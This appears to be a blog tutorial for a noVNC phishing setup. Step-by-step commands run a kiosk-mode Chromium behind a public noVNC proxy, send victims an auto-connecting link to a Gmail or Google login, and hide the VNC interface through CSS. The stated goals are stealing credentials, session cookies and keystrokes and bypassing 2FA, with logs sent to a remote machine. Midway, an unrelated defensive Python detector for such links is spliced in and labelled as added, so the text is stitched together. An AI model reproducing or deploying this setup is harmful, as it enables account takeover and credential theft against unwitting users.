Exploiting noVNC for 2FA Bypass

Using noVNC for Credential Acquisition and Bypassing 2FA

noVNC is both a JavaScript library for VNC clients and an application built on top of this library. Compatible with any modern browser, including mobile versions for iOS and Android, noVNC allows the web browser to function as a VNC client, enabling remote access to a machine.

So, how can we use noVNC to acquire credentials and bypass 2FA? Here’s the process:

  1. Set up a server with noVNC.
  2. Start Chromium (or any other browser) in Kiosk mode.
  3. Direct it to the desired website for user authentication (e.g., accounts.google.com).
  4. Send the link to the target user. When they click the URL, they will access the VNC session without realizing it.
  5. Since Chromium is configured in Kiosk mode, the user experience will appear as a normal web page.

Exploitation Possibilities

The exploitation possibilities of this method are vast:

  • Inject JS into the browser.
  • Use an HTTP proxy connected to the browser to log all activities.
  • Terminate the VNC session after user authentication.
  • Capture the browser session token (Right-click > Inspect > Application > Cookies) after the user disconnects.
  • Run a background keylogger.
  • Or get creative and find other approaches (remember, the server is yours).

noVNC Setup and Demonstration

1. Deploy a Kali Linux Instance

Use any cloud service provider or deploy locally to set up a Linux machine. I will use Kali Linux for this demonstration because I prefer it, but you can choose any other Linux distribution you are comfortable with.


2. Install TigerVNC

First, you need to install VNC software. I tested two options: X11vnc and TigerVNC. After several tests, I chose to use TigerVNC.

sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer

3. Set Up a VNC Password

vncpasswd

On Kali Linux, I didn’t need to create the xstartup file, but if you encounter any errors, you can configure it manually.

nano ~/.vnc/xstartup

Paste or write the following:

#!/bin/sh
xrdb "$HOME/.Xresources"
xsetroot -solid grey
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
# Fix to make GNOME work
export XKL_XMODMAP_DISABLE=1
/etc/X11/Xsession

Add execution permissions:

chmod +x ~/.vnc/xstartup

4. Restart the VNC Server

Restart the VNC server, choosing the screen size settings according to your needs. noVNC automatically adjusts to the browser’s screen size, but do your own testing.

vncserver -depth 32 -geometry 1920x1080

5. Download and Run noVNC

git clone https://github.com/novnc/noVNC.git

OR

apt install novnc

Now run noVNC locally or publicly. Here are the commands:

  • Check the VNC server port:

vncserver -list

Example: 5901, 5902, 5903, etc.

  • Run noVNC:

./noVNC/utils/novnc_proxy --vnc localhost:5901

  • Set up an SSH tunnel:

ssh -L 6080:127.0.0.1:6080 root@server

  • Run publicly using port 8081:

ufw allow http
./noVNC/utils/novnc_proxy --vnc 0.0.0.0:5901 --listen 8081

6. Access VNC and Run the Browser in Kiosk Mode

Access your VNC and run the browser in Kiosk mode. I used Chromium, but you can use whatever suits your needs.

chromium --no-sandbox --app=https://gmail.com --kiosk

7. Send the URL to the “Victim” to Connect Automatically

http://127.0.0.1:6080/vnc.html?autoconnect=true&password=YOUR-PASSWORD

The autoconnect=true&password=VNCPASSWORD query parameters make the browser connect and authenticate to the VNC session without any action from the user. If you want to rename the query parameters, you can modify the vnc.html file.
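From the defender's side, the link shape described above (vnc.html with autoconnect and an embedded password) and the noVNC element ids that step 8 hides are both usable as indicators. The following is an added example, not code from the post or from the noVNC project, that flags such links in a constructed proxy-log format ('<timestamp> <client-ip> <url>') and, optionally, a fetched page body; the addresses and log lines are constructed.

```python
from urllib.parse import urlparse, parse_qs

# Element ids from noVNC's vnc.html (the ones the post hides with CSS); they remain even if the query parameters are renamed.
NOVNC_BODY_MARKERS = ("noVNC_transition", "noVNC_control_bar_anchor", "noVNC_status")
NOVNC_PAGES = ("vnc.html", "vnc_lite.html")

def novnc_indicators(url, body=""):
    """Return the noVNC indicators found in a URL and an optional fetched page body."""
    parsed = urlparse(url)
    query = {k.lower(): [v.lower() for v in vals] for k, vals in parse_qs(parsed.query).items()}
    found = []
    if parsed.path.rsplit("/", 1)[-1].lower() in NOVNC_PAGES:
        found.append("novnc_page")
    if "true" in query.get("autoconnect", []):
        found.append("autoconnect")
    if "password" in query:
        found.append("password_in_url")
    if any(marker in body for marker in NOVNC_BODY_MARKERS):
        found.append("novnc_markup")
    return found

def severity(indicators):
    """A link that connects unattended with an embedded VNC password is the phishing shape described above."""
    if "autoconnect" in indicators and "password_in_url" in indicators:
        return "high"
    if "novnc_page" in indicators or "novnc_markup" in indicators:
        return "medium"
    return "none"

def scan_proxy_log(lines):
    """Return (client, url, severity, indicators) for log lines whose URL carries noVNC indicators.
    Assumed (constructed) line format: '<timestamp> <client-ip> <url>'."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        found = novnc_indicators(parts[2])
        sev = severity(found)
        if sev != "none":
            hits.append((parts[1], parts[2], sev, found))
    return hits

# Constructed sample log lines, not real traffic; 203.0.113.10 is a documentation address.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 https://accounts.google.com/signin",
    "2024-01-01T10:00:05Z 10.0.0.5 http://203.0.113.10:8081/vnc.html?autoconnect=true&password=s3cret",
    "2024-01-01T10:00:12Z 10.0.0.9 https://203.0.113.10/vnc.html",
]
```

Because the post notes that the query parameters can be renamed, the page-body markers are the more durable indicator; a plain vnc.html hit is still worth a look, since legitimate noVNC consoles are rarely reached from a mail link.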


8. Modify the CSS to Remove Visual Elements

noVNC displays a custom loading page, a VNC control bar, and some additional unnecessary visual elements that should be removed.

Open vnc.html, find the divs below, and add the inline styles shown.

<!-- Hide unnecessary items -->
<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;">
<div id="noVNC_status" style="display:none"></div>

<!-- Makes the loading page white -->
<div id="noVNC_transition" style="background-color:white;color:white">

Important Notes

  • You are giving remote access to your machine! It should not have anything valuable stored on it.
  • Any logged data should likely be sent to a remote machine.
  • Do not use the root account. Set up a restricted user account that uses the VNC service.
  • Configure the Kiosk mode more restrictively.

This post is licensed under CC BY 4.0 by the author.